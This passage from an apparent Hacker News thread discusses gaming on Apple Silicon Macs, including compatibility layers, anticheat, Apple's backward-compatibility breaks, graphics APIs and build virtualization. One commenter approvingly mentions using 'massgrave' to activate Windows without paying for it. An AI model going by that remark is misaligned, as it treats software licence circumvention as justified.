        You can also have enough bandwidth but be compute limited and get lower performance than expected. This is more likely to be the case for Apple Silicon vs. high power GPUs.

bfrog 7 hours ago

The big win would be a Linux-capable device. I don't have any interest in macOS, but the Apple M-series parts always seem amazing.

In theory this is where Qualcomm would come in and provide something, but in practice they seem to be stuck in Qualcomm land, where only lawyers matter and actual users and developers can get stuffed.

  • cogman10 7 hours ago

    Yeah, this is the biggest hole in ARM offerings.

    The only well-supported devices are either phones or servers, with very little in between.

    Even common consumer devices like wifi routers will have ARM SoCs pinned to the kernel version they shipped with, which gets supported for 1 to 2 years at most.

  • mrkeen 7 hours ago

    I have a pretty good time on Fedora Asahi (MacBook Air M1). It supposedly also supports the M2 but no higher.

    And it's a PITA to install (it needs to be started from within macOS, using scripts, with the partitions already in a good state).

    • mysteria 2 hours ago

      The issue is that it's hacky, and in that case I'd rather go with an Intel or AMD x86 system with more or less out-of-the-box Linux support. What we're looking for is a performant ARM system where Linux is a first-class citizen.

    • Gethsemane 7 hours ago

      If I was less lazy I could probably find this answer online, but how do you find the battery life these days? I'd love to make the switch, but that's the only thing holding me back...

    • 2OEH8eoCRo0 7 hours ago

      How's Thunderbolt and DisplayPort alt mode?

littlecranky67 8 hours ago

And here I am, selling my MacBook M4 Pro to buy a MacBook Air and a dedicated gaming machine. I've tried gaming on the MacBook with Heroic, GPTK, Whisky, the RPCS3 emulator, and some native ports. When a game runs, the performance is stunning for a laptop, but there are always glitches, bugs, and annoyances that take the joy out of it. Needless to mention the lack of any sort of online multiplayer, due to missing anticheat support.

I wish Apple would take gaming more seriously and make GPTK a first-class citizen, like Proton on Linux.

  • ryao 8 hours ago

    Off the top of my head, here is what that needs:

      1. Implementing PR_SET_SYSCALL_USER_DISPATCH
      2. Implementing ntsync
      3. Implementing OpenGL 4.6 support (currently only OpenGL 4.1 is supported)
      4. Implementing Vulkan 1.4 with various extensions used by DXVK and vkd3d-proton.
    
    That said, there are alternatives to those things.

      1. Not implementing this would just break games like Jurassic World where DRM hard codes Windows syscalls. I do not believe that there are many of these, although I could be wrong.
      2. There is https://github.com/marzent/wine-msync, although implementing ntsync in the XNU kernel would be better.
      3. The latest OpenGL isn't that important these days now that Vulkan has been widely adopted, although having the latest version would be nice to have for parity. Not many things would suffer if it were omitted.
      4. They could add the things needed for MoltenVK to support Vulkan 1.4 with those extensions on top of Metal:
    
    https://github.com/KhronosGroup/MoltenVK/issues/203

    It is a shame that they do not work with Valve on these things. If they did, Proton would likely be supported on macOS from within Steam, and GPTK would benefit.

  • bob1029 8 hours ago

    > lack of anticheat support.

    I just redid my Windows machine to get TPM 2.0 and Secure Boot for Battlefield 6. I did use massgrave this time, because I've definitely paid enough Microsoft taxes over the last decade. I thought I would hate this new stuff, but it runs much better than the old CSM BIOS mode.

    Anything not protected by kernel-level anticheat I play on my Steam Deck now. Proton is incredible. I am shocked that games like Elden Ring run this well on a Linux handheld.

  • dlojudice 8 hours ago

    Good point. Many people (including me) switched to Apple Silicon with the hope (or promise?) of having just one computer for work and leisure, given the potential of the new architecture. That didn't happen, or only partially happened, which amounts to the same thing.

    In my case, for software development, I'd be happy with an entry-level MacBook Air (now with a minimum of 16GB) for $999.

  • unsupp0rted 8 hours ago

    I can't sell my MacBook Pro because the speakers are so insanely good. Air can't compare. The speakers are worth the extra kilos.

    • HDThoreaun 6 hours ago

      I have never once used my laptop speakers. Not saying you're wrong, but it's crazy how different priorities for products can be.

      • prewett 3 hours ago

        I was shocked when I tried out the 2019 MBP speakers; they were almost as good as my (low-end) studio headphones. I was even more shocked by the M2 speakers, which are arguably better (although the frequency response isn't as flat, I think; there is definitely something a little artificial, but it sounds really good). I really could not imagine laptop speakers being even close to on par with decent headphones. Perhaps they aren't on par with $400 headphones; I've never had any of those. But now, by preference, I listen on the laptop speakers. It's not a priority (I'm totally happy to go back to the headphones), more like an unexpected perk.

        • adastra22 3 hours ago

          But why would you ever use the speakers?

          • unsupp0rted 25 minutes ago

            I work alone, so I can use the speakers at any volume without bothering anybody or wearing anything in my ears or on my head. It's wonderful.

  • hannesfur 8 hours ago

    I agree: the difference between the various compatibility layers and native games is very steep at times. Death Stranding on my M2 Pro looks so good it’s hard to believe, but running GTA Online is brittle and clunky… Even when games have native macOS builds, it’s rare to find them with Apple Silicon support (and even rarer with Metal support). There is a notable exception, though: Arma 3 has experimental Apple Silicon support, albeit with significant limitations (multiplayer, flying & mods). Although I don’t believe it’s in Apple’s interest, gaming on Linux might become an option in the future, even on Macs, but the lack of ARM builds is an even bigger problem there…

    Since I am playing mostly MSFS 2024 these days, I currently use GeForce Now, which is fine, but cloud gaming still isn’t quite there yet…

    • kllrnohj 7 hours ago

      > Death Stranding on my M2 Pro looks so good it’s hard to believe,

      Death Stranding is a great-looking game to be sure, but it's also kind of hard to get excited about a 5-year-old game achieving RTX 2060 performance on a $2000+ system. And that was apparently worthy of a keynote feature...

  • gbil 6 hours ago

    On top of that, what is Apple's strategy on gaming? Advertise extra performance and features that you only get if you upgrade your whole device? That is unsustainable, to put it mildly. There are eGPU enclosures with TB5; developing something like that for the Mac would make more sense if they really cared about gaming.

  • ge96 7 hours ago

    I'm gonna be looking for a 4080 in an SFF form factor, since my current gaming rig can't be upgraded to Win 11. Also, I wouldn't mind a smaller desktop.

    Edit: for now I'll get the Win 10 ESU.

  • gwbas1c 8 hours ago

    Honestly, gaming consoles are so much cheaper and "no hassle." I never game on my Mac.

    • littlecranky67 6 hours ago

      More expensive in the long run, as the games are more expensive and you need some kind of subscription to play online.

  • dimgl 8 hours ago

    Yeah I agree. If it weren't for gaming I would have already uninstalled Windows permanently. It's really unfortunate because it sticks out as the one product in my house that I truly despise but I can't get rid of, due to gaming.

    I've been trying to get Unreal Engine to work on my MacBook, but Unity is an order of magnitude easier to run. So I'm also stuck doing game development on my PC. The Metal APIs exist and apparently they're quite good... it's a shame that more engines don't support them.

  • bamboozled 8 hours ago

    Sometimes I just feel like buying the latest and greatest game; I have an M4 too, and the choices are usually quite abysmal. I agree.

    • qnpnp 5 hours ago

      My solution is cloud gaming in that case, such as GeforceNow (for compatible games), or Shadow (for a whole PC to do as you please).

  • sapiogram 8 hours ago

    > I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

    Note that games with anticheat don't work on Linux with Proton either. Everything else does, though.

    • dralley 8 hours ago

      Several games with anticheat work, but it's up to the developers whether they check the box that allows it to, which is why, even though both Apex Legends and Squad use Easy Anticheat, Squad works and Apex does not.

      Of course some anticheats aren't supported at all, like EA Javelin.

      • ascagnel_ 6 hours ago

        Apex Legends is an interesting case because EA/Respawn initially shipped with first-class support for the Steam Deck (going as far as to make changes to the game client so it would get a "Verified" badge from Valve) -- including "check[ing] the box that allows it to work". However, the observation was that the anti-cheat code on Linux wasn't as effective, so they eventually dropped support for it.

        https://forums.ea.com/blog/apex-legends-game-info-hub-en/dev...

    • rpdillon 8 hours ago

      Many of them do, but it's a game of cat and mouse, so it's more hit and miss than I would like.

  • mrcwinn 7 hours ago

    Going back to the Air's screen from your Pro will be a steep fall.

    • littlecranky67 6 hours ago

      Not really, 95% of the time I use it in a dock with 2 external screens.

  • gjsman-1000 8 hours ago

    Many people blame the lack of OpenGL/Vulkan... but I really don't buy it. It doesn't pass the sniff test as an objection. PlayStation doesn't support OpenGL/Vulkan (they have their own proprietary APIs: GNM, GNMX, PSSL). Nintendo supports Vulkan, but performance is so bad that almost everyone uses the proprietary API (NVN/NVN2). Xbox obviously doesn't accept OpenGL/Vulkan either, requiring DirectX. Understanding of Metal is widespread in mobile gaming, so it's weird that AAA couldn't pull from that industry if they wished.

    • coldpie 8 hours ago

      The primary reason is Apple's environment is too unstable for gaming's most common business model. Most games are developed, released, and then sold for years and years with little or no maintenance. Additionally, gamers expect the games they purchased to continue to work indefinitely. Apple regularly breaks backwards compatibility in a wide variety of ways (code signing requirements; breaking OS API changes; hardware architecture changes). That means software run on Apple OSes must be constantly maintained or else it will eventually stop working. Most games aren't developed like that.

      No one who was forced to write a statement like [this](https://help.steampowered.com/en/faqs/view/5E0D-522A-4E62-B6...) is going to be enthusiastic about continuing to work with Apple.

      • galad87 8 hours ago

        Game developers make most of their money shortly after a game's release, so a 15-year-old game no longer working shouldn't make much difference in terms of revenue.

        Anyway, the whole situation was quite bad. Many games were still 32-bit, even though macOS itself had been mainly 64-bit for almost 10 years or more. And Valve didn't help either: the Steam store is full of 64-bit games mislabeled as 32-bit. They could have written a simple script to check whether a game is actually 64-bit or not; instead they decided to do nothing and keep the chaos.

        The best solution would have been a lightweight VM to run old 32-bit games; computers nowadays are powerful enough to do so.

      • gjsman-1000 8 hours ago

        I've heard this argument, but it also doesn't pass the sniff test in 2025.

        1. When is the next transition on bits? Is Apple going to suddenly move to 128-bit? No.

        2. When is the next transition on architecture? Is Apple going to suddenly move back to x86? No.

        3. When is the next API transition? Is Apple suddenly going to add Vulkan or reinvigorate OpenGL? No. They've been clear it's Metal since 2014, 11 years ago. That's plenty of time for the industry to follow if they cared, and mobile gaming has adopted it without issue.

        We might as well complain that the PlayStation 4 was completely incompatible with the PlayStation 3.

        • fruitworks 8 hours ago

          What happens when Apple switches to RISC-V, or deprecates versions of Metal in a backwards-incompatible way, or mandates some new code-signing technique?

          The attitude in the Apple developer ecosystem is that Apple tells you to jump, and you ask how high.

          You could complain that PlayStation 4 software is incompatible with PlayStation 3, but this is the PC gaming industry; there are higher standards for software compatibility here that only a couple of companies can ignore.

          • gjsman-1000 8 hours ago

            Apple will never transition to RISC-V, especially when they cofounded ARM. They have 35 years of institutional knowledge in ARM. Their cores and techniques are licensed and patented with mixtures of their own IP and ARM-compatible IP. That is decades away, if ever. Even the assumption that RISC-V will eventually achieve parity with ARM performance is untested, as ISAs sometimes do fail at scale (Itanium, anyone? While unlikely to repeat, even a discovered 5% structural deficit would handicap adoption permanently).

            "This is the PC gaming industry"

            Who said Apple needed to present themselves as a PC gaming alternative over a console alternative?

            • fruitworks 7 hours ago

              Consoles are dying and PCs are replacing them. Like the original commenter suggested, people want to run PC games. The market has decided that the benefits of compatibility outweigh the added complexity. On the PC you have access to a massive, expanding back catalog of old software, far more competition in the market, mods, and the ability to run whatever software you want alongside games (Discord, TeamSpeak, game streaming, etc.).

              Macs are personal computers, whether or not they come from some official IBM Personal Computer compatibility bloodline.

              • gjsman-1000 7 hours ago

                Steam Deck - 6 million

                Sega Saturn - 9 million

                Wii U - 13 million

                PlayStation 5 - 80 million

                Nintendo Switch - 150 million

                Nintendo Switch 2 opening weekend - 4 million in 3 days

                Sure.

                • Sohcahtoa82 6 hours ago

                  And in the last 48 hours, Steam peaked at 39.5M users online, providing a highly pessimistic lower-bound on how many PC gamers there are.

                  https://store.steampowered.com/stats/stats/

                  If you consider time zones (not every PC gamer is online at the same time), the fact that it's not the weekend, and other factors, I'd estimate the PC gaming audience is at least 100M.

                  Unfortunately, there's no possible way to get an exact number. There are multiple gaming PC manufacturers, not to mention all the gaming PCs that are built by hand. I'm part of a PC gaming community, and nearly 90% of us have a PC built by ourselves or by a friend or family member. https://pdxlan.net/lan-stats/

        • coldpie 8 hours ago

          I mean, I worked in this space, and I'm telling you why many of the people I worked with weren't interested in supporting Apple. I'm happy to hear your theories if you don't like mine, though.

          • gjsman-1000 8 hours ago

            I think the past bit people, but unlike the PS4 transition or gaming consoles in the past (which were rarely backwards compatible), there wasn't enough cultural momentum to plow through it... leaving "don't support Apple" as a bit of an institutional memory at this point, even though the odds of another transition seem almost nonexistent. What would it even be? 128-bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

            • coldpie 8 hours ago

              Yeah, I buy that, so I think we are actually agreeing with each other. The very rough backwards support story Apple has had for the past decade, which I mentioned, has made people uninterested in supporting the platform, even if they're better about it now, as you claim (though I'm unconvinced about that personally, having worked on macOS software for more than a decade).

              > What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

              Sure, I can think of lots of things. Every macOS update when I worked in this space broke something that we had to go fix. Code signature requirements change a bit in almost every release, not hard to imagine a 10-year-old game finally running afoul of some new requirement. I can easily see them removing old, unmaintained APIs. OpenGL is actively unmaintained and I would guess a massive attack vector, not hard to see that going away. Have you ever seen their controller force feedback APIs? Lol, they're so bad, it's a miracle they haven't removed those already.

            • bigyabai 5 hours ago

              > even though the odds of another transition seem almost nonexistent.

              You see, the existence of that "almost" already represents less confidence than developers have in every game console, as well as Linux and Windows.

        • jolux 7 hours ago

          > I've heard this argument, but it also doesn't pass the sniff test in 2025.

          I mean, it's at least partially true. I used to play BioShock Infinite on my MacBook in high school; there was a full port. Unfortunately it's 32-bit and doesn't run anymore, and there hasn't been a remaster yet.

    • littlecranky67 8 hours ago

      I don't buy it either, because Apple's GPTK works similarly to Proton: they have a DX12-to-Metal layer that works quite well, when it works. And GPTK is based on Wine, just as Proton is. It's more the other annoyances, like the lack of Steam support. There are patched versions of Steam circulating that run in GPTK (offline mode), but that is where everything gets finicky and brittle. It is mostly community effort, and I think gaming could be way better on Apple if they embraced the Proton approach that they started with GPTK.

      • ldoughty 7 hours ago

        Apple collects no money from Steam sales, so they don't see a reason to support it.

        You don't buy Apple to use your computer the way you want to use it. You buy it to use it the way they tell you to, e.g. the "you're holding it wrong" fiasco.

        In some ways this is good for general consumers (and even developers: with limited config comes less unpredictability). However, this is generally bad for power users or "niche" users like Mac gamers.

        • littlecranky67 7 hours ago

          > Apple collects no money from Steam sales, so they don't see a reason to support it.

          That is true, but now they are in a position where their hardware is actually more affordable and powerful than its Windows/x86 counterpart, and Win 11 is a shitload of adware and an annoyance in itself, layered on top of an OS. They could massively expand their hardware sales into the gaming sector.

          I'm eyeing a Framework Desktop with an AMD AI 395 APU for gaming (I am happy with just 1080p@60) and am looking at 2000€ to spend, because I want a small form factor. Don't quote me on the benchmarks, but a Mac Mini with an M4 Pro is probably cheaper and more powerful for gaming, IF it had proper software support.

        • raw_anon_1111 7 hours ago

          Apple collects no money from Photoshop, Microsoft, or anything else that runs on the Mac besides the tiny minority of apps sold on the Mac App Store.

          Not to mention many subscription services on iOS that don’t allow you to subscribe through the App Store.

    • kllrnohj 6 hours ago

      PlayStation, Nintendo, and Xbox each have tens of millions of gamers. Meanwhile, macOS makes up ~2% of Steam users, which is probably a pretty good proxy for the number of macOS gamers.

      Why would I do anything bespoke at all for such a tiny market? Much less adopt an entirely unique GPU API?

      Apple refusing to support OpenGL and Vulkan absolutely hurt their gaming market. It increased the porting costs for a market that was already tiny.

      • littlecranky67 4 hours ago

        > Why would I do anything bespoke at all for such a tiny market?

        Because there is a huge potential here to increase market share.

  • SigmundA 8 hours ago

    Yep, I use Moonlight / Sunshine / Apollo to stream from my gaming PC, so I still use my Mac setup but get nearly perfect Windows gaming with the PC elsewhere in the house.

    This has been by far the best setup until Apple can take gaming seriously, which may never happen.

anuraj 42 minutes ago

Too underwhelming. Apple under Tim Cook has been running out of steam. What prevents Apple from shipping hundreds of GPU cores and higher memory bandwidth? They need to catch the AI wave before they perish under it.

  • pertymcpert 37 minutes ago

    What are you talking about? People love Macs for running local LLMs.

    • hu3 3 minutes ago

      For real work, though? My colleagues couldn't get past toy demos.

      And it ruins battery life.

      For coding it's on par with GPT-3 at best, which is amateur tier these days.

      It's good for text to speech and speech to text but PCs can do that too.

ironman1478 6 hours ago

It's surprising to me that Macs aren't a more popular target for games. They're extremely capable machines, and they're console-like in that there isn't much variation in hardware, as opposed to traditional PC gaming. I would think it's easier to develop a game for a MacBook than for a Windows machine, where you never know what hardware setup the user will have.

  • shantara 6 hours ago

    The main roadblock for porting games to the Mac has never been the hardware, but Apple themselves. Their entire attitude is that they can do whatever they please with their platforms, and expect the developers to adjust to the changes, no matter how breaking. It’s a constant support treadmill, fixing the stuff that Apple broke in your previously perfectly functioning product after every update. If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional. This works for apps, but it’s completely antithetical to the way game development processes on any other platform are structured. You finish a project, release it, do a patch cycle, and move on.

    And that’s not even talking about porting the game to either Metal or an absolutely ancient OpenGL version that could be removed with any upcoming OS version. A significant effort just to address a tiny market.

    • coffeeaddict1 6 hours ago

      > an absolutely ancient OpenGL version

      I still don't get this. Apple is a trillion-dollar company. How much would it cost to pay a couple of engineers to maintain an up-to-date version on top of Metal? Their current implementation is 4.1; it wouldn't cost them much to provide 4.6. Even Microsoft collaborated with Mesa to build a translation layer on top of DX12; Apple could do the same.

      • astrange 3 hours ago

        They can't do Khronos things because they don't get along with Khronos. Same reason they stopped having NVidia GPUs forever ago.

        • coffeeaddict1 2 hours ago

          > They can't do Khronos things because they don't get along with Khronos.

          Has anyone figured out what exactly the crux of their beef is? OpenGL 4.1 came out in 2010, so surely whatever happened has been settled by now.

      • mandarax8 4 hours ago

        Their current OpenGL 4.1 implementation actually does run on top of Metal, making it even more blatantly obvious that they just don't want to.

    • zarzavat 2 hours ago

      Gamedevs have not forgotten that Apple attempted to get Unreal Engine banned from all their platforms, thus rug pulling every game built on top of it.

      It was only the intervention of Microsoft that managed to save Apple from their own tantrum.

    • ryandrake 5 hours ago

      The company in general never really seemed that interested in Games, and that came right from Steve Jobs. John Carmack made a Facebook post[1] several years ago with some interesting insider insights about his advocacy of gaming to Steve Jobs, and the lukewarm response he received. They just never really seemed to be a priority at Apple.

      1: https://www.facebook.com/permalink.php?story_fbid=2146412825...

      • astrange 3 hours ago

        It's impossible to care about video games if you live in SV because the weather is too nice. You can feel the desire to do any indoor activity just fade away when you move there. This is somehow true even though there's absolutely nothing to do outside except take walks (or "go hiking" as locals call it) and go to that Egyptian museum run by a cult.

        Somehow Atari, EA and PlayStation are here despite this. I don't know how they did it.

        Meanwhile, Nintendo is successful because they're in Seattle where it's dark and rains all the time.

    • astrange 6 hours ago

      > If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional.

      IIRC developers literally got 15 years of warning about that one.

      • ascagnel_ 5 hours ago

        Apple's mistake was allowing 32-bit stuff on Intel in the first place -- if they had delayed the migration ~6 months and passed on the Core Duo for Core 2 Duo, it would've negated the need to ever allow 32-bit code on x86.

      • bigyabai 5 hours ago

        IIRC that didn't convince many developers to revisit their software. I still have hard drives full of Pro Tools projects that open on Mojave but error on Catalina. Not to mention all the Steam games that launch fine on Windows/Linux but error on macOS...

        • astrange 5 hours ago

          Yes, game developers can't revisit old games because they throw out the dev environments when they're done, or their middleware can't get updated, etc.

          But it's not possible to keep maintaining 32-bit forever. That's twice the code and it can't support a bunch of important security features, modern ABIs, etc. It would be better to run old programs in a VM of an old OS with no network access.

          • Rohansi an hour ago

            Another big, non-technical reason is most games make most of their money around their release date. Therefore there is no financial benefit to updating the game to keep it working. Especially not on macOS where market share is small.

          • bigyabai 2 hours ago

            > But it's not possible to keep maintaining 32-bit forever.

            Apple had the money to support it, we both know that. They just didn't respect their Mac owners enough, Apple saw more value in making them dogfood iOS changes since that's where all the iOS devs are held captive. Security was never a realistic excuse considering how much real zombie code still exists in macOS.

            Speaking personally, I just wanted Apple to wait for WoW64 support to hit upstream. Their careless interruption of my Mac experience is why I ditched the ecosystem as a whole. If Apple cannot invest in making it a premium experience, I'll take my money elsewhere.

  • lazypenguin 6 hours ago

    As far as I’ve seen, Apple is to blame here as they usually make it harder to target their platform and don’t really try to cooperate with the rest of the industry.

    As a game developer, I have to literally purchase Apple hardware to test rather than being able to conveniently download a VM

    • jjtheblunt 6 hours ago

      for games, how would you test in a VM, when games so explicitly want direct hardware access?

      i am obviously misunderstanding something, i mean.

      • zulban 5 hours ago

        I run Linux and test my Windows releases on a VM. It works great.

        Sure, I'm not doing performance benchmarking and it's just smoke tests and basic user stories, but that's all that 98% of indie developers do for cross platform support.

        Apple has been intensely stupid as a platform to launch on, though I did do it eventually. I didn't like Apple before and now I like it even less.

      • lazypenguin 2 hours ago

        I develop a game that easily runs on much weaker hardware and runs fine in a VM; I would say most simple 3D & 2D games would work fine in a VM on modern hardware.

        However, these days it's possible to pass hardware through to your VM, so I would be able to pass through a 2nd GPU to macOS... if it would let me run it as a guest.

      • Liquix 2 hours ago

        On Linux, KVM provides passthrough for GPUs and other hardware, so the VM "steals" the passed-through resources from the host and gets near-native performance.
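
        A minimal sketch of what that setup can look like with QEMU, driven from Python (the PCI address, memory size, and disk image are placeholders; the second GPU must already be bound to the vfio-pci driver and the IOMMU enabled):

            import subprocess

            # boot a KVM guest with a second GPU handed over via VFIO
            subprocess.run([
                "qemu-system-x86_64",
                "-enable-kvm",                            # hardware virtualization via KVM
                "-cpu", "host", "-m", "16G",
                "-device", "vfio-pci,host=0000:01:00.0",  # PCI address of the passed-through GPU
                "-drive", "file=guest.qcow2,format=qcow2",
            ])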

    • neogodless 6 hours ago

      I'm not a subject matter expert, but I do find it a little odd to read the second half of that. I'd expect, beyond development/debugging, there's certainly a phase of testing that requires hardware that matches your target system?

      Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation, which is probably running Windows. Especially for consoles like XBOX One or newer, and PS4 or newer, which are essentially PCs. And then builds get passed off to a team that has the hardware.

      Is anyone developing games for Windows on Apple hardware? Do they run Parallels and call it a day? How is the gaming performance? If the answers to those 3 questions are "yes, yes, great", then Apple supports PC game development better than they support Apple game development?

      • lazypenguin 2 hours ago

        Basically you are correct, MacOS has to be treated like a console in that way. Except you get all the downsides of that development workflow with none of the upsides. The consoles provide excellent debugging and other tools for targeting their platform, can't say the same for MacOS.

        For testing, I can do a large amount of testing in a VM for my game. Maybe not 100% and not full user testing but nothing beats running on the native hardware and alpha/beta with real users.

        Also, since I can pass through hardware to my VM I can get quite good performance by passing through a physical GPU for example. This is possible and quite straightforward to do on a Linux host. I'm not sure if it's possible using Parallels.

      • throwuxiytayq 6 hours ago

        > Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation

        I don’t think anybody does this. I haven’t heard about official emulators for any of the mainstream consoles. Emulation would be prohibitively slow.

        Developers usually test on dedicated devkits which are a version of the target console (often with slightly better specs as dev builds need more memory and run more slowly). This is annoying, slow and difficult, but at least you can get these dev kits, usually for a decent price, and there’s a point to trying to ship on those platforms. Meanwhile, nobody plays games on macs, and Apple is making zero effort to bring in the developers or the gamers. It’s a no-chicken-and-no-egg situation, really.

    • whatever1 6 hours ago

      You do it for Xbox and PlayStation and Nintendo.

    • cesarvarela 6 hours ago

      I'm sure you literally purchased Nvidia hardware for game development.

      • stronglikedan 5 hours ago

        A component is much cheaper than an entire dedicated system (which would of course contain a similar component).

        • cesarvarela 2 hours ago

          I don't know; a 5090 costs about 3k, a 5070 about 500. You can either buy a MacBook Pro or a Mac Mini. Seems reasonable.

  • jajuuka 2 hours ago

    Multiple solid reasons have been mentioned, from ones created by Apple to ones enforced in software by Apple. One that hasn't been mentioned is the lack of market share. The macOS market is just tiny and very limited. It's also not a growing market. PC gaming isn't blowing up either, but the number of players is simply higher.

    Ports to macOS have not done well, from what I've heard. On PC, however, you can see ports do really well, which has encouraged studios like Sony and Square Enix to invest more in PC ports, even much later, after the console versions have sold well. There are just not a lot of reasons to add the tech debt and complexity of supporting the Mac as well.

    Even big publishers like Blizzard, who had been Mac devs for a long time, axed the dedicated Mac team and client and moved to a unified client. This has downsides, like Mac-specific issues: if those are not critical, they get put in the pile with the rest of the bugs.

  • jayd16 6 hours ago

    Mac dev sucks. You're forced to use macOS and Xcode (for the final build, anyway). You're not able to virtualize the build machines.

    Apple is actively hostile to how you would build for Linux or PC or console.

    • matthew-wegner 6 hours ago

      > You're not able to virtualize the build machines.

      Sure you can. And officially, too. Apple still ships a bunch of virtualization drivers in macOS itself. Have a look:

      /System/Library/Extensions/IONetworkingFamily.kext/Contents/PlugIns/AppleVmxnet3Ethernet.kext

      Whether or not you're using ESXi, or want to, is an entirely different question. But "you're not able to" is simply incorrect. I virtualize several build agents and have for years with no issues.

      macOS 26 is the last major version to support Intel, so once macOS 28 is the latest this will probably become impossible (macOS 26 should be able to run Xcode 27, though the removal of the platform may change whether the previous year's OS stays supported).

      • GTP 6 hours ago

        > Apple still ships a bunch of virtualization drivers in macOS itself.

        I think OP means virtualizing on something that isn't Apple.

      • jayd16 6 hours ago

        Interesting. The last I looked into it, you could only officially do this on Mac hardware (defeating the purpose).

        You can get an xcode building for arm Macs on PC hardware with this?

    • nasseri 6 hours ago

      This is simply not the case. Every major game framework/engine targets Mac natively.

      If you are building your engine/game from scratch, you absolutely do not need to use Xcode

      • jayd16 6 hours ago

        Why don't you look through the Unreal and Unity docs and see if you can make a build without a Mac and xcode.

        • nasseri 6 hours ago

          I think I misunderstood your point as “developing a game on Mac sucks”, vs “developing for Mac without a Mac sucks” which I absolutely can’t disagree with

        • nasseri 6 hours ago

          Yea you’re right I skipped over the part where you said the final build required it.

          Nonetheless that’s a small fraction of the time spent actually developing the game.

          • jayd16 6 hours ago

            Ideally, it's a continuous part of development because you're making daily (or more) builds and testing them.

            That makes it a continuous headache to keep your Mac builders up.

            It means you need to double your dev hardware costs or more, as you need a gaming PC to target your core audience plus Macs to handle the Mac bugs.

            It means your mac build machines are special snowflakes because you can't just use VMs.

            The list goes on and on of Mac being actively hostile to the process.

            Just Rider running on a Mac is pleasant sure, but that's not the issue.

    • coldtea 6 hours ago

      >Mac dev sucks. You're forced to use macOS and Xcode (for the final build, anyway)

      Having to use xcode "for the final build" is irrelevant to the game development experience.

      • jayd16 6 hours ago

        If you're an indie with just PC hardware it sure as hell matters.

  • leshenka 6 hours ago

    I was very surprised, and pleasantly so, that Cyberpunk 2077 can maintain 60 FPS (14", M4 Pro, 24 GB RAM) with only occasional dips. Not at full resolution (actually around Full HD), but at least without "frame generation". With frame generation turned on, it can output 90-100 FPS depending on the environment, but VSync is disabled, so dips become way more noticeable.

    It even has a "for this Mac" preset, which is good enough that you don't need to tinker with settings to have a decent experience.

    The game is paused, almost "frozen", when it's not visible on screen, which helps with battery (it can sit in the background without any noticeable impact on battery or temperature). Overall, a way better experience than I expected.

  • mavbo 5 hours ago

    I play a lot of World of Warcraft on my M3 MacBook Pro which has a native MacOS build. It's a CPU bottlenecked game with most users recommending the AMD X3D CPUs to achieve decent framerates in high end content. I'm able to run said content at high (7/10) graphics settings at 120fps with no audible fan noise for hours at a time on battery. It's been night and day compared to previous Windows machines.

  • sosodev 6 hours ago

    It's easier to develop a game for a mac in some ways but you reach a tiny fraction of gamers that way.

    • hangonhn 6 hours ago

      I wonder how that might look once you factor in Apple TV devices. They're pretty weak devices now but future ones can come with M-class CPUs. That's a huge source of potential revenue for Apple.

      • amluto 5 hours ago

        The current Apple TV is, in many respects, unbelievably bad, and it has nothing to do with the CPU.

        Open up the YouTube app and try to navigate the UI. It’s okay but not really up to the Apple standard. Now try to enter text in the search bar. A nearby iPhone will helpfully offer to let you use it like a keyboard. You get a text field, and you can type, and keystrokes are slowly and not entirely reliably propagated to the TV, but text does not stay in sync. And after a few seconds, in the middle of typing, the TV will decide you’re done typing and move focus to a search result, and the phone won’t notice, and it gets completely desynchronized.

        • ascagnel_ 5 hours ago

          The YouTube app has never been good and never felt like a native app -- it's a wrapper around web tech.

          More importantly for games, though, is the awful storage architecture around the TV boxes. Games have to slice themselves up into 2GB storage chunks, which can be purged from the system whenever the game isn't actively running. The game has to be aware of missing chunks and download them on-demand.

          It makes open-world games nearly impossible, and it makes anything with significant storage requirements effectively impossible. As much as Apple likes to push the iOS port of Death Stranding, that game cannot run on tvOS as currently architected for that reason.

  • Damogran6 6 hours ago

    There's a cost/value calculation that just doesn't work well... I have a Ryzen 9 / RTX 3070 PC ($2k over time) and my M4 Mini ($450) holds its own for most normal user stuff... sprinting ahead for specific tasks (video codecs)... but the 6-year-old dedicated GPU on the PC annihilates the Mini in pushing pixels. You can spec an Apple that does better for gaming, but man, are you gonna pay for it, and still not keep up with current PC GPUs.

    Now...something like minecraft or SubNautica? The M4 is fine, especially if you're not pushing 4k 240hz.

    Apple has been pushing the gaming experience for years (iPhone 4s?) but it never REALLY seems to land, and when someone has a great gaming experience in a modern AAA game, they always seem to be using a $4500 Studio or similar.

  • LtdJorge 6 hours ago

    Metal is a very recent API compared to DirectX and OpenGL. Also, there are very few people on the Mac, and even fewer who also play videogames. There are almost no libraries and tooling built around Metal and the Mac SDKs, and a very small audience, so it doesn't make financial sense.

  • viktorcode 4 hours ago

    The porting is not straightforward; you must switch to Metal, and you should adapt your rendering pipeline to tiled deferred shading.

  • spogbiper 6 hours ago

    you have to release major titles for windows and console, because there are tons of customers using them.

    so a mac port, even if simple, is additional cost. there you have the classic chicken and egg problem. the cost doesn't seem to be justified by the number of potential sales, so major studios ignore the platform. and as long as they do, gamers ignore the platform

    i've seen it suggested that Apple could solve this standoff by funding the ports, maybe they have done this a few times. but Apple doesn't seem to care much about it

  • GTP 6 hours ago

    Until a few years ago, it was common for gamers to assemble their own PC, something you can't do with a Mac. Not sure if this is still common among gamers, though.

    • LarsDu88 4 hours ago

      The advent of silicon interposer technology means modular memory and separate CPUs/GPUs will soon be obsolete, IMO.

      The communication bandwidth you can achieve by putting the CPU, GPU, and memory together at the factory is much higher than having these components separate.

      Sad for enthusiasts, but practically inevitable

  • ikamm 6 hours ago

    - have to build using Xcode on macOS

    - have to pay Apple to have your executable signed

    - poor Vulkan support

    The hardware has never been an issue, it's Apple's walled garden ecosystem.

  • ProfessorZoom 6 hours ago

    i think it depends on how easy it is for a dev to deploy to apple. M1 was great at running call of duty in a windows emulator. iPhone can run the newest resident evil. apple needs to do more to convince developers to deploy to mac

  • croes 5 hours ago

    Doesn’t macOS favor a 60Hz output? Gamers prefer much higher rates.

    And don’t forget they made a VR headset without controllers.

    Apple doesn’t care about games

    • jsheard 5 hours ago

      > Doesn’t macOS favor a 60Hz output?

